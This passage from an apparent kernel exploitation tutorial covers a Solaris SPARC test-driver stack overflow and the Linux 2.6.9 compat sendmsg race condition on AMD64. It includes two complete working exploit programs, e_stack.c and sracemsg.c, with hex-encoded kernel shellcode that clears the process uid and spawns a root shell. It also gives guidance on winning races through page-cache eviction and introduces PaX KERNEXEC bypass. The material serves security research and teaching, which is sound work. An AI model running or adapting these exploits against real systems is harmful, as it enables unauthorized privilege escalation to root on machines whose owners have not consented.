        cmn_err(CE_CONT, "Requested to copy over buf %d bytes from 
%p\n",
t_c.size, &buf);

        ddi_copyin((void *)t_c.addr, buf, t_c.size, 0); [1]

        return 0;
}

static int test_ioctl (dev_t dev, int cmd, intptr_t arg, int mode,
                        cred_t *cred_p, int *rval_p )
{
    cmn_err(CE_CONT, "ioctl called : cred %d %d\n", cred_p->cr_uid,
cred_p->cr_gid);

    switch ( cmd )
    {
        case TEST_STACKOVF: {
                handle_stack(arg);
        }

[...]

< / > 

The vulnerability is quite self explanatory and is a lack of 'input
sanitizing' before calling the ddi_copyin at [1]. 

Exploit follows :

< stuff/expl/solaris/e_stack.c >

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include "test.h"

#define BUFSIZ 192

char buf[192];

typedef struct psinfo {
        int     pr_flag;        /* process flags */
        int     pr_nlwp;        /* number of lwps in process */
        pid_t   pr_pid;         /* unique process id */
        pid_t   pr_ppid;        /* process id of parent */
        pid_t   pr_pgid;        /* pid of process group leader */
        pid_t   pr_sid;         /* session id */
        uid_t   pr_uid;         /* real user id */
        uid_t   pr_euid;        /* effective user id */
        gid_t   pr_gid;         /* real group id */
        gid_t   pr_egid;        /* effective group id */
        uintptr_t pr_addr;      /* address of process */
        size_t  pr_size;        /* size of process image in Kbytes 
*/
} psinfo_t;

#define ALIGNPAD        3

#define PSINFO_PATH     "/proc/self/psinfo"

unsigned long getaddr()
{
        psinfo_t        info;
        int             fd;

        fd = open(PSINFO_PATH, O_RDONLY);
        if ( fd == -1)
        {
                perror("open");
                return -1;
        }

        read(fd, (char *)&info, sizeof (info));
        close(fd);
        return info.pr_addr;
}
 

#define UPSARGS_OFFSET 0x330 + 0x161

int exploit_me()
{
        char    *argv[] = { "princess", NULL };
        char    *envp[] = { "TERM=vt100", "BASH_HISTORY=/dev/null",
"HISTORY=/dev/null", "history=/dev/null",
     
"PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin",
"HISTFILE=/dev/null", NULL };

         printf("Pleased to see you, my Princess\n");
         setreuid(0, 0);
         setregid(0, 0);
         execve("/bin/sh", argv, envp);
         exit(0);

}

#define SAFE_FP     0x0000000001800040 + 1
#define DUMMY_FILE  "/tmp/test"

int main()
{
        int                     fd;
        int                     ret;
        struct test_comunique   t;
        unsigned long           *pbuf, retaddr, p_addr;

        memset(buf, 'A', BUFSIZ);

        p_addr = getaddr();

        printf("[*] - Using proc_t addr : %p \n", p_addr);

        retaddr = p_addr + UPSARGS_OFFSET + ALIGNPAD;

        printf("[*] - Using ret addr : %p\n", retaddr);

        pbuf = &buf[32];

        pbuf += 2;

        /* locals */

        for ( ret = 0; ret < 14; ret++ )
                *pbuf++ = 0xBBBBBBBB + ret;
        *pbuf++ = SAFE_FP;
        *pbuf = retaddr - 8;

        t.size = sizeof(buf);
        t.addr = buf;

        fd = open(DUMMY_FILE, O_RDONLY);

        ret = ioctl(fd, 1, &t);
        printf("fun %d\n", ret);

        exploit_me();
        close(fd);

}
 
< / >

The exploit is quite simple (we apologies, but we didn't have a 
public one
to show at time of writing) : 

  - getaddr() uses procfs exported psinfo data to get the proc_t 
address
    of the running process.

  - the return addr is calculated from proc_t addr + the offset of 
the
    u_psargs array + the three needed bytes for alignment
 
  - SAFE_FP points just 'somewhere in the data segment' (and ready 
to be
    biased for the real dereference). Due to SPARC window mechanism 
we
    have to provide a valid address that it will be used to 'load' 
the
    saved procedure registers upon re-entering. We don't write on 
that
    address so whatever readable kernel part is safe. (in more 
complex 
    scenarios you could have to write over too, so take care). 

  - /tmp/test is just a link to the /devices/pseudo/test@0:0 file   
   
  
  - the exploit has to be compiled as a 32-bit executable, so that 
the
    syscall_trap32 offset is meaningful 
  

You can compile and test the driver on your boxes, it's really 
simple. You
can extend it to test more scenarios, the skeleton is ready for it.


------[ 2.4 - A primer on logical bugs : race conditions


Heap and Stack Overflow (even more, NULL pointer dereference) are 
seldomly found on their own, and, since the automatic and human 
auditing
work goes on and on, they're going to be even more rare. 
What will probably survive for more time are 'logical bugs', which 
may
lead, at the end, to a classic overflow. 
Figure out a modelization of 'logical bugs' is, in our opinion, 
nearly 
impossible, each one is a story on itself.
Notwithstanding this, one typology of those is quite interesting 
(and
'widespread') and at least some basic approaches to it are suitable 
for a
generic description. 

We're talking about 'race conditions'. 

In short, we have a race condition everytime we have a small window 
of
time that we can use to subvert the operating system behaviour. A 
race
condition is usually the consequence of a forgotten lock or other
syncronization primitive or the use of a variable 'too much time 
after'
the sanitizing of its value. Just point your favorite vuln database 
search
engine towards 'kernel race condition' and you'll find many 
different
examples. 

Winning the race is our goal. This is easier on SMP systems, since 
the two 
racing threads (the one following the 'raceable kernel path' and 
the other
competing to win the race) can be scheduled (and be bounded) on 
different
CPUs. We just need to have the 'racing thread' go faster than the 
other 
one, since they both can execute in parallel.
Winning a race on UP is harder : we have to force the first kernel 
path
to sleep (and thus to re-schedule). We have also to 'force' the 
scheduler
into selecting our 'racing' thread, so we have to take care of 
scheduling
algorithm implementation (ex. priority based). On a system with a 
low CPU
load this is generally easy to get : the racing thread is usually
'spinning' on some condition and is likely the best candidate on the
runqueue. 

We're going now to focus more on 'forcing' a kernel path to sleep,
analyzing the nowadays common interface to access files, the page 
cache. 
After that we'll present the AMD64 architecture and show a real race
exploit for Linux on it, based on the sendmsg [5] vulnerability.
Winning the race in that case turns the vuln into a stack based 
one, so
the discussion will analize stack based explotation on Linux/AMD64 
too.


---[ 2.4.1 - Forcing a kernel path to sleep 

  
If you want to win a race, what's better than slowing down your 
opponent?
And what's slower than accessing the hard disk, in a modern 
computer ? 
Operating systems designers know that the I/O over the disk is one 
of the
major bottleneck on system performances and know aswell that it is 
one of
the most frequent operations requested. 

Disk accessing and Virtual Memory are closely tied : virtual memory 
needs
to access the disk to accomplish demand paging and in/out swapping, 
while
the filesystem based I/O (both direct read/write and memory mapping 
of
files) works in units of pages and relays on VM functions to 
perform the
write out of 'dirty' pages. Moreover, to sensibly increase 
performances,
frequently accessed disk pages are kept in RAM, into the so-called 
'Page
Cache'. 

Since RAM isn't an inexhaustible resource, pages to be loaded and 
'cached'
into it have to be carefully 'selected'. The first skimming is made 
by the
'Demand Paging' approach : a page is loaded from disk into memory 
only
when it is referenced, by the page fault handler code. 
Once a filesystem page is loaded into memory, it enters into the 
'Page
Cache' and stays in memory for an unspecified time (depending on 
disk
activity and RAM availability, generally a LRU policy is used as an
evict-policy). 
Since it's quite common for an userland application to repeatedly 
access
the same disk content/pages (or for different applications, to 
access
common files), the 'Page Cache' sensibly increases performances.

One last thing that we have to discuss is the filesystem 'page 
clustering'.
Another common principle in 'caching' is the 'locality'. Pages near 
the
referenced one are likely to be accessed in a near future and since 
we're
accessing the disk we can avoid the future seek-rotation latency if 
we
load in more pages after the referenced one. How many to load is
determined by the page cluster value. 
On Linux that value is 3, so 2^3 pages are loaded after the 
referenced
one. On Solaris, if the pages are 8-kb sized, the next eight pages 
on a
64kb boundary are brought in by the seg_vn driver (mmap-case).

Putting all together, if we want to force a kernel path to sleep we 
need
to make it reference an un-cached page, so that a 'fault' happens 
due to
demand paging implementation. The page fault handler needs to 
perform disk 
I/O, so the process is put to sleep and another one is selected by 
the
scheduler. Since probably we want aswell our 'controlled contents' 
to be
at the faulting address we need to mmap the pages, modify them and 
then
exhaust the page cache before making the kernel re-access them 
again. 

Filling the 'page cache' has also the effect of consuming a large 
quantity
of RAM and thus increasing the in/out swapping. On modern operating
systems one can't create a condition of memory pressure only by 
exhausting
the page cache (as it was possible on very old implementations), 
since
only some amount of RAM is dedicated to the Page Cache and it would 
keep
on stealing pages from itself, leaving other subsystems free to 
perform
well. But we can manage to exhaust those subsystem aswell, for 
example by
making the kernel do a large amount of 'surviving' slab-
allocations. 

Working to put the VM under pressure is something to take always in 
mind,
since, done that, one can manage to slow down the kernel (favouring 
races)
and make kmalloc or other allocation function to fail. (A thing that
seldomly happens on normal behaviour). 

It is time, now, for another real life situation. We'll show the 
sendmsg
[5] vulnerability and exploiting code and we'll describe briefly 
the AMD64
architectural more exploiting-relevant details.  
   

---[ 2.4.2 - AMD64 and race condition exploiting: sendmsg


AMD64 is the 64-bit 'extension' of the x86 architecture, which is 
natively
supported. It supports 64-bit registers, pointers/virtual addresses 
and
integer/logic operations. AMD64 has two primary modes of operation, 
'Long
mode', which is the standard 64-bit one (32-bit and 16-bit binaries 
can be
still run with almost no performance impact, or even, if 
recompiled, with
some benefit from the extended number of registers, thanks to the
sometimes-called 'compatibility mode') and 'Legacy mode', for 32-
bit 
operating systems, which is basically just like having a standard 
x86
processor environment.

Even if we won't use all of them in the sendmsg exploit, we're 
going now
to sum a couple of interesting features of the AMD64 architecture :

  - The number of general purpose register has been extended from 8 
up to 
    16. The registers are all 64-bit long (referred with 
'r[name|num]',
    f.e. rax, r10). Just like what happened when took over the 
transition
    from 16-bit to 32-bit, the lower 32-bit of general purpose 
register 
    are accessible with the 'e' prefix (f.e. eax).

  - push/pop on the stack are 64-bit operations, so 8 bytes are
    pushed/popped each time. Pointers are 64-bit too and that 
allows a
    theorical virtual address space of 2^64 bytes. As happens for 
the
    UltraSPARC architecture, current implementations address a 
limited
    virtual address space (2^48 bytes) and thus have a VA-hole (the 
least
    significant 48 bits are used and bits from 48 up to 63 must be 
copies
    of bit 47 : the hole is thus between 0x7FFFFFFFFFFF and
    0xFFFF800000000000). 
    This limitation is strictly implementation-dependant, so any 
future
    implementation might take advantage of the full 2^64 bytes 
range.  
 
  - It is now possible to reference data relative to the Instruction
    Pointer register (RIP). This is both a good and a bad news, 
since it
    makes easier writing position independent (shell)code, but also 
makes
    it more efficient (opening the way for more performant PIE-alike
    implementations)

  - The (in)famous NX bit (bit 63 of the page table entry) is 
implemented
    and so pages can be marked as No-Exec by the operating system. 
This is 
    less an issue than over UltraSPARC since actually there's no 
operating
    system which implements a separated userspace/kernelspace 
addressing,
    thus leaving open space to the use of the 'return-to-userspace'
    tecnique. 

  - AMD64 doesn't support anymore (in 'long mode') the use of
    segmentation. This choice makes harder, in our opinion, the 
creation
    of a separated user/kernel address space. Moreover the FS and GS
    registers are still used for different pourposes. As we'll see, 
the
    Linux Operating System keeps the GS register pointing to the 
'current'
    PDA (Per Processor Data Structure). (check : /include/asm-
x86_64/pda.h 
    struct x8664_pda .. anyway we'll get back on that in a short).


After this brief summary (if you want to learn more about the AMD64
architecture you can check the reference manuals at [3]) it is time 
now to
focus over the 'real vulnerability', the sendmsg [5] one : 

"When we copy 32bit ->msg_control contents to kernel, we walk the
same userland data twice without sanity checks on the second pass.
Moreover, if original looks small enough, we end up copying to on-
stack
array."
       
< linux-2.6.9/net/compat.c >

int cmsghdr_from_user_compat_to_kern(struct msghdr *kmsg,
                               unsigned char *stackbuf, int 
stackbuf_size)
{
        struct compat_cmsghdr __user *ucmsg;
        struct cmsghdr *kcmsg, *kcmsg_base;
        compat_size_t ucmlen;
        __kernel_size_t kcmlen, tmp;

        kcmlen = 0;
        kcmsg_base = kcmsg = (struct cmsghdr *)stackbuf;            
[1]

[...]

        while(ucmsg != NULL) {
                if(get_user(ucmlen, &ucmsg->cmsg_len))              
[2]
                        return -EFAULT;

                /* Catch bogons. */
                if(CMSG_COMPAT_ALIGN(ucmlen) <
                   CMSG_COMPAT_ALIGN(sizeof(struct compat_cmsghdr)))
                        return -EINVAL;
                if((unsigned long)(((char __user *)ucmsg - (char 
__user
*)kmsg->msg_control)
                                   + ucmlen) > kmsg-
msg_controllen) [3]
                        return -EINVAL;

                tmp = ((ucmlen - CMSG_COMPAT_ALIGN(sizeof(*ucmsg))) 
+
                       CMSG_ALIGN(sizeof(struct cmsghdr)));
                kcmlen += tmp;                                      
 [4]
                ucmsg = cmsg_compat_nxthdr(kmsg, ucmsg, ucmlen);
        }

[...]

        if(kcmlen > stackbuf_size)                                  
 [5] 
                kcmsg_base = kcmsg = kmalloc(kcmlen, GFP_KERNEL);

[...]

        while(ucmsg != NULL) {
                __get_user(ucmlen, &ucmsg->cmsg_len);               
 [6]
                tmp = ((ucmlen - CMSG_COMPAT_ALIGN(sizeof(*ucmsg))) 
+
                       CMSG_ALIGN(sizeof(struct cmsghdr)));
                kcmsg->cmsg_len = tmp;
                __get_user(kcmsg->cmsg_level, &ucmsg->cmsg_level);
                __get_user(kcmsg->cmsg_type, &ucmsg->cmsg_type);

                /* Copy over the data. */
                if(copy_from_user(CMSG_DATA(kcmsg),                 
 [7]
                                  CMSG_COMPAT_DATA(ucmsg),
                                  (ucmlen -
CMSG_COMPAT_ALIGN(sizeof(*ucmsg)))))
                        goto out_free_efault;


< / >


As it is said in the advisory, the vulnerability is a double-
reference to
some userland data (at [2] and at [6]) without sanitizing the value 
the
second time it is got from the userland (at [3] the check is 
performed,
instead). That 'data' is the 'size' of the user-part to copy-in
('ucmlen'), and it's used, at [7], inside the copy_from_user. 

This is a pretty common scenario for a race condition : if we 
create two
different threads, make the first one enter the codepath and , 
after [4],
we manage to put it to sleep and make the scheduler choice the other
thread, we can change the 'ucmlen' value and thus perform a 'buffer
overflow'. 

The kind of overflow we're going to perform is 'decided' at [5] : 
if the
len is little, the buffer used will be in the stack, otherwise it 
will be
kmalloc'ed. Both the situation are exploitable, but we've chosen 
the stack
based one (we have already presented a slab exploit for the Linux
operating system before). We're going to use, inside the exploit, 
the
tecnique we've presented in the subsection before to force a 
process to
sleep, that is making it access data on a cross page boundary (with 
the
second page never referenced before nor already swapped in by the 
page
clustering mechanism) :

+------------+ --------> 0x20020000 [MMAP_ADDR + 32 * PAGE_SIZE] [*]
|            |
| cmsg_len   |           first cmsg_len starts at 0x2001fff4
| cmsg_level |           first struct compat_cmsghdr
| cmsg_type  |
|------------| -------->              0x20020000  [cross page 
boundary]
| cmsg_len   |           second cmsg_len starts at 0x20020000)
| cmsg_level |           second struct compat_cmsghdr
| cmsg_type  |
|            |
+------------+ --------> 0x20021000

[*] One of those so-called 'runtime adjustement'. The page 
clustering
    wasn't showing the expected behaviour in the first 32 mmaped-
pages,
    while was just working as expected after.


As we said, we're going to perform a stack-based explotation 
writing past
the 'stackbuf' variable. Let's see where we get it from : 

< linux-2.6.9/net/socket.c > 

asmlinkage long sys_sendmsg(int fd, struct msghdr __user *msg, 
unsigned
flags)
{
        struct compat_msghdr __user *msg_compat =
        (struct compat_msghdr __user *)msg;
        struct socket *sock;
        char address[MAX_SOCK_ADDR];
        struct iovec iovstack[UIO_FASTIOV], *iov = iovstack;
        unsigned char ctl[sizeof(struct cmsghdr) + 20];
        unsigned char *ctl_buf = ctl;
        struct msghdr msg_sys;
        int err, ctl_len, iov_size, total_len;
[...]

        if ((MSG_CMSG_COMPAT & flags) && ctl_len) {
err = cmsghdr_from_user_compat_to_kern(&msg_sys, ctl, sizeof(ctl));

[...]

< / >

The situation is less nasty as it seems (at least on the systems we 
tested
the code on) : thanks to gcc reordering the stack variables we get 
our
'msg_sys' struct placed as if it was the first variable.
That simplifies a lot our exploiting task, since we don't have to 
take
care of 'emulating' in userspace the structure referenced between 
our
overflow and the 'return' of the function (for example the struct 
sock).
Exploiting in this 'second case' would be slightly more complex, but
doable aswell.

The shellcode for the exploit is not much different (as expected, 
since
the AMD64 is a 'superset' of the x86 architecture) from the ones 
provided
before for the Linux/x86 environment, netherless we've two focus on 
two
important different points : the 'thread/task struct dereference' 
and the
'userspace context switch approach'. 

For the first point, let's start analyzing the get_current()
implementation : 

< linux-2.6.9/include/asm-x86_64/current.h >

#include <asm/pda.h>

static inline struct task_struct *get_current(void)
{
        struct task_struct *t = read_pda(pcurrent);
        return t;
}

#define current get_current()

[...]

#define GET_CURRENT(reg) movq %gs:(pda_pcurrent),reg

< / > 

< linux-2.6.9/include/asm-x86_64/pda.h >

struct x8664_pda {
        struct task_struct *pcurrent;   /* Current process */
        unsigned long data_offset;      /* Per cpu data offset from 
linker
address */
        struct x8664_pda *me;       /* Pointer to itself */
        unsigned long kernelstack;  /* top of kernel stack for 
current */
[...]

#define pda_from_op(op,field) ({ \
       typedef typeof_field(struct x8664_pda, field) T__; T__ 
ret__; \
       switch (sizeof_field(struct x8664_pda, field)) {             
    \
case 2: \
asm volatile(op "w %%gs:%P1,%0":"=r"
(ret__):"i"(pda_offset(field)):"memory"); break;\
[...]

#define read_pda(field) pda_from_op("mov",field)
 
< / > 

The task_struct is thus no more into the 'current stack' (more 
precisely,
referenced from the thread_struct which is actually saved into the
'current stack'), but is stored into the 'struct x8664_pda'. This 
struct
keeps many information relative to the 'current' process and the 
CPU it is
running over (kernel stack address, irq nesting counter, cpu it is 
running
over, number of NMI on that cpu, etc).
As you can see from the 'pda_from_op' macro, during the execution 
of a
Kernel Path, the address of the 'struct x8664_pda' is kept inside 
the %gs
register. Moreover, the 'pcurrent' member (which is the one we're 
actually
interested in) is the first one, so obtaining it from inside a 
shellcode
is just a matter of doing a : 

        movq %gs:0x0, %rax 

From that point on the 'scanning' to locate uid/gid/etc is just the 
same
used in the previously shown exploits. 

The second point which quite differs from the x86 case is the 
'restore'
part (which is, also, a direct consequence of the %gs using). 
First of all we have to do a '64-bit based' restore, that is we've 
to push
the 64-bit registers RIP,CC,RFLAGS,RSP and SS and call, at the end, 
the
'iretq' instruction (the extended version of the 'iret' one on x86).
Just before returning we've to remember to perform the 'swapgs'
instruction, which swaps the %gs content with the one of the 
KernelGSbase
(MSR address C000_0102h).
If we don't perform the gs restoring, at the next syscall or 
interrupt the
kernel will use an invalid value for the gs register and will just 
crash. 

Here's the shellcode in asm inline notation :

void stub64bit()
{
asm volatile (
                "movl %0, %%esi\t\n"
                "movq %%gs:0, %%rax\n"
                "xor %%ecx, %%ecx\t\n"
                "1: cmp $0x12c, %%ecx\t\n"
                "je 4f\t\n"
                "movl (%%rax), %%edx\t\n"
                "cmpl %%esi, %%edx\t\n"
                "jne 3f\t\n"
                "movl 0x4(%%rax),%%edx\t\n"
                "cmp %%esi, %%edx\t\n"
                "jne 3f\t\n"
                "xor %%edx, %%edx\t\n"
                "movl %%edx, 0x4(%%rax)\t\n"
                "jmp 4f\t\n"
                "3: add $4,%%rax\t\n"
                "inc %%ecx\t\n"
                "jmp 1b\t\n"
                "4:\t\n"
                "swapgs\t\n"
                "movq $0x000000000000002b,0x20(%%rsp)\t\n"
                "movq %1,0x18(%%rsp)\t\n"
                "movq $0x0000000000000246,0x10(%%rsp)\t\n"
                "movq $0x0000000000000023,0x8(%%rsp)\t\n"
                "movq %2,0x0(%%rsp)\t\n"
                "iretq\t\n"
                : : "i"(UID), "i"(STACK_OFFSET), "i"(CODE_OFFSET)
                );
}

With UID being the 'uid' of the current running process and 
STACK_OFFSET
and CODE_OFFSET the address of the stack and code 'segment' we're
returning into in userspace. All those values are taken and patched 
at
runtime in the exploit 'make_kjump' function : 

< stuff/expl/linux/sracemsg.c > 

#define PAGE_SIZE 0x1000
#define MMAP_ADDR ((void*)0x20000000)
#define MMAP_NULL ((void*)0x00000000)
#define PAGE_NUM 128

#define PATCH_CODE(base,offset,value) \
       *((uint32_t *)((char*)base + offset)) = (uint32_t)(value)

#define fatal_errno(x,y) { perror(x); exit(y); }

struct cmsghdr *g_ancillary;

/* global shared value to sync threads for race */
volatile static int glob_race = 0;

#define UID_OFFSET 1
#define STACK_OFF_OFFSET 69
#define CODE_OFF_OFFSET  95

[...]

int make_kjump(void)
{
  void *stack_map = mmap((void*)(0x11110000), 0x2000,
PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, 0, 0);
  if(stack_map == MAP_FAILED)
    fatal_errno("mmap", 1);


  void *shellcode_map = mmap(MMAP_NULL, 0x1000,
PROT_READ|PROT_WRITE|PROT_EXEC, 
MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, 0,
0);
  if(shellcode_map == MAP_FAILED)
    fatal_errno("mmap", 1);

  memcpy(shellcode_map, kernel_stub, sizeof(kernel_stub)-1);

  PATCH_CODE(MMAP_NULL, UID_OFFSET, getuid());
  PATCH_CODE(MMAP_NULL, STACK_OFF_OFFSET, 0x11111111);
  PATCH_CODE(MMAP_NULL, CODE_OFF_OFFSET,  &eip_do_exit);
}

< / > 
 

The rest of the exploit should be quite self-explanatory and we're 
going
to show the code here after in a short. Note the lowering of the 
priority
inside start_thread_priority ('nice(19)'), so that we have some more
chance to win the race (the 'glob_race' variable works just like a
spinning lock for the main thread - check 'race_func()').

As a last note, we use the 'rdtsc' (read time stamp counter) 
instruction
to calculate the time that intercurred while trying to win the 
race. If
this gap is high it is quite probable that a scheduling happened. 
The task of 'flushing all pages' (inside page cache), so that we'll 
be
sure that we'll end using demand paging on cross boundary access, 
is not
implemented inside the code (it could have been easily added) and 
is left
to the exploit runner. Since we have to create the file with 
controlled
data, those pages end up cached in the page cache. We have to force 
the
subsystem into discarding them. It shouldn't be hard for you, if you
followed the discussion so far, to perform tasks that would 'flush 
the
needed pages' (to disk) or add code to automatize it. (hint : mass 
find &
cat * > /dev/null is an idea).

Last but not least, since the vulnerable function is inside 
'compat.c',
which is the 'compatibility mode' to run 32-bit based binaries, 
remember to
compile the exploit with the -m32 flag.

< stuff/expl/linux/sracemsg.c >
   
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sched.h>
#include <sys/socket.h>

#define PAGE_SIZE 0x1000
#define MMAP_ADDR ((void*)0x20000000)
#define MMAP_NULL ((void*)0x00000000)
#define PAGE_NUM 128

#define PATCH_CODE(base,offset,value) \
       *((uint32_t *)((char*)base + offset)) = (uint32_t)(value)

#define fatal_errno(x,y) { perror(x); exit(y); }

struct cmsghdr *g_ancillary;

/* global shared value to sync threads for race */
volatile static int glob_race = 0;

#define UID_OFFSET 1
#define STACK_OFF_OFFSET 69
#define CODE_OFF_OFFSET  95

char kernel_stub[] =

"\xbe\xe8\x03\x00\x00"                   //  mov    $0x3e8,%esi
"\x65\x48\x8b\x04\x25\x00\x00\x00\x00"   //  mov    %gs:0x0,%rax
"\x31\xc9"                               //  xor    %ecx,%ecx  (15
"\x81\xf9\x2c\x01\x00\x00"               //  cmp    $0x12c,%ecx
"\x74\x1c"                               //  je     400af0
<stub64bit+0x38>
"\x8b\x10"                               //  mov    (%rax),%edx
"\x39\xf2"                               //  cmp    %esi,%edx
"\x75\x0e"                               //  jne    400ae8
<stub64bit+0x30>
"\x8b\x50\x04"                           //  mov    0x4(%rax),%edx
"\x39\xf2"                               //  cmp    %esi,%edx
"\x75\x07"                               //  jne    400ae8
<stub64bit+0x30>
"\x31\xd2"                               //  xor    %edx,%edx
"\x89\x50\x04"                           //  mov    %edx,0x4(%rax)
"\xeb\x08"                               //  jmp    400af0
<stub64bit+0x38>
"\x48\x83\xc0\x04"                       //  add    $0x4,%rax
"\xff\xc1"                               //  inc    %ecx
"\xeb\xdc"                               //  jmp    400acc
<stub64bit+0x14>
"\x0f\x01\xf8"                           //  swapgs (54
"\x48\xc7\x44\x24\x20\x2b\x00\x00\x00"   //  movq   $0x2b,0x20(%rsp)
"\x48\xc7\x44\x24\x18\x11\x11\x11\x11"   //  movq   
$0x11111111,0x18(%rsp)
"\x48\xc7\x44\x24\x10\x46\x02\x00\x00"   //  movq   
$0x246,0x10(%rsp)
"\x48\xc7\x44\x24\x08\x23\x00\x00\x00"   //  movq   $0x23,0x8(%rsp) 
 /* 23
32-bit , 33 64-bit cs */
"\x48\xc7\x04\x24\x22\x22\x22\x22"       //  movq   
$0x22222222,(%rsp)
"\x48\xcf";                              //  iretq


void eip_do_exit(void)
{
  char *argvx[] = {"/bin/sh", NULL};
  printf("uid=%d\n", geteuid());
  execve("/bin/sh", argvx, NULL);
  exit(1);
}


/*
 * This function maps stack and code segment
 * - 0x0000000000000000 - 0x0000000000001000   (future code space)
 * - 0x0000000011110000 - 0x0000000011112000   (future stack space)
 */

int make_kjump(void)
{
  void *stack_map = mmap((void*)(0x11110000), 0x2000,
PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, 0, 0);
  if(stack_map == MAP_FAILED)
    fatal_errno("mmap", 1);


  void *shellcode_map = mmap(MMAP_NULL, 0x1000,
PROT_READ|PROT_WRITE|PROT_EXEC, 
MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, 0,
0);
  if(shellcode_map == MAP_FAILED)
    fatal_errno("mmap", 1);

  memcpy(shellcode_map, kernel_stub, sizeof(kernel_stub)-1);

  PATCH_CODE(MMAP_NULL, UID_OFFSET, getuid());
  PATCH_CODE(MMAP_NULL, STACK_OFF_OFFSET, 0x11111111);
  PATCH_CODE(MMAP_NULL, CODE_OFF_OFFSET,  &eip_do_exit);
}

int start_thread_priority(int (*f)(void *), void* arg)
{
  char *stack = malloc(PAGE_SIZE*4);
  int tid = clone(f, stack + PAGE_SIZE*4 -4,
CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VM, arg);
  if(tid < 0)
  fatal_errno("clone", 1);

  nice(19);
  sleep(1);
  return tid;
}

int race_func(void* noarg)
{
  printf("[*] thread racer getpid()=%d\n", getpid());
  while(1)
  {
    if(glob_race)
    {
      g_ancillary->cmsg_len = 500;
      return;
    }
  }
}

uint64_t tsc()
{
  uint64_t ret;
  asm volatile("rdtsc" : "=A"(ret));

  return ret;
}

struct tsc_stamp
{
  uint64_t before;
  uint64_t after;
  uint32_t access;
};

struct tsc_stamp stamp[128];

inline char *flat_file_mmap(int fs)
{
  void *addr = mmap(MMAP_ADDR, PAGE_SIZE*PAGE_NUM, 
PROT_READ|PROT_WRITE,
MAP_SHARED|MAP_FIXED, fs, 0);
  if(addr == MAP_FAILED)
    fatal_errno("mmap", 1);
  return (char*)addr;
}

void scan_addr(char *memory)
{
  int i;
  for(i=1; i<PAGE_NUM-1; i++)
  {
    stamp[i].access = (uint32_t)(memory + i*PAGE_SIZE);
    uint32_t dummy = *((uint32_t *)(memory + i*PAGE_SIZE-4));
    stamp[i].before = tsc();
    dummy = *((uint32_t *)(memory + i*PAGE_SIZE));
    stamp[i].after  = tsc();

  }
}

/* make code access first 32 pages to flush page-cluster */
/* access: 0x20000000 - 0x2000XXXX */

void start_flush_access(char *memory, uint32_t page_num)
{
  int i;
  for(i=0; i<page_num; i++)
  {
    uint32_t dummy = *((uint32_t *)(memory + i*PAGE_SIZE));
  }
}


void print_single_result(struct tsc_stamp *entry)
{
  printf("Accessing: %p, tsc-difference: %lld\n", entry->access,
entry->after - entry->before);
}


void print_result()
{
  int i;
  for(i=1; i<PAGE_NUM-1; i++)
  {
    printf("Accessing: %p, tsc-difference: %lld\n", stamp[i].access,
stamp[i].after - stamp[i].before);
  }
}


void fill_ancillary(struct msghdr *msg, char *ancillary)
{
  msg->msg_control = ((ancillary + 32*PAGE_SIZE) - sizeof(struct
cmsghdr));
  msg->msg_controllen = sizeof(struct cmsghdr) * 2;

  /* set global var thread race ancillary data chunk */
  g_ancillary = msg->msg_control;

  struct cmsghdr* tmp = (struct cmsghdr *)(msg->msg_control);
  tmp->cmsg_len   = sizeof(struct cmsghdr);
  tmp->cmsg_level = 0;
  tmp->cmsg_type  = 0;
  tmp++;

  tmp->cmsg_len   = sizeof(struct cmsghdr);
  tmp->cmsg_level = 0;
  tmp->cmsg_type  = 0;
  tmp++;

  memset(tmp, 0x00, 172);
}

int main()
{
  struct tsc_stamp single_stamp = {0};
  struct msghdr msg = {0};

  memset(&stamp, 0x00, sizeof(stamp));
  int fd = open("/tmp/file", O_RDWR);
  if(fd == -1)
    fatal_errno("open", 1);

  char *addr = flat_file_mmap(fd);

  fill_ancillary(&msg, addr);

  munmap(addr, PAGE_SIZE*PAGE_NUM);
  close(fd);
  make_kjump();
  sync();

  printf("Flush all pages and press a enter:)\n");
  getchar();

  fd = open("/tmp/file", O_RDWR);
  if(fd == -1)
    fatal_errno("open", 1);
  addr = flat_file_mmap(fd);

  int t_pid = start_thread_priority(race_func, NULL);
  printf("[*] thread main getpid()=%d\n", getpid());

  start_flush_access(addr, 32);


  int sc[2];
  int sp_ret = socketpair(AF_UNIX, SOCK_STREAM, 0, sc);
  if(sp_ret < 0)
    fatal_errno("socketpair", 1);

  single_stamp.access = (uint32_t)g_ancillary;
  single_stamp.before = tsc();

  glob_race =1;
  sendmsg(sc[0], &msg, 0);

  single_stamp.after = tsc();

  print_single_result(&single_stamp);

  kill(t_pid, SIGKILL);
  munmap(addr, PAGE_SIZE*PAGE_NUM);
  close(fd);
  return 0;
}

< / > 


------[ 3 - Advanced scenarios 


In an attempt to ''complete'' our tractation on kernel exploiting 
we're
now going to discuss two 'advanced scenarios' : a stack based kernel
exploit capable to bypass PaX [18] KERNEXEC and Userland / 
Kernelland
split and an effective remote exploit, both for the Linux kernel. 


---[ 3.1 - PaX KERNEXEC & separated kernel/user space


The PaX KERNEXEC option emulates a no-exec bit for pages at kernel 
land
on an architecture which hasn't it (x86), while the User / Kerne 
Land
split blocks the 'return-to-userland' approach that we have 
extensively
described and used in the paper. With those two protections active 
we're
basically facing the same scenario we encountered discussing the 
Solaris/SPARC environment, so we won't go in more details here (to 
avoid
duplicating the tractation). 

This time, thou, we won't have any executable and controllable 
memory area
(no u_psargs array), and we're going to present a different 
tecnique which
doesn't require to have one. Even if the idea behind applyes well 
to any
no-exec and separated kernel/userspace environment, as we'll see in 
a
short, this approach is quite architectural (stack management and 
function
call/return implementation) and Operating System (handling of 
credentials)
specific. 

Moreover, it requires a precise knowledge of the .text layout of the
running kernel, so at least a readable image (which is a default 
situation
on many distros, on Solaris, and on other operating systems we 
checked) or
a large or controlled infoleak is necessary. 

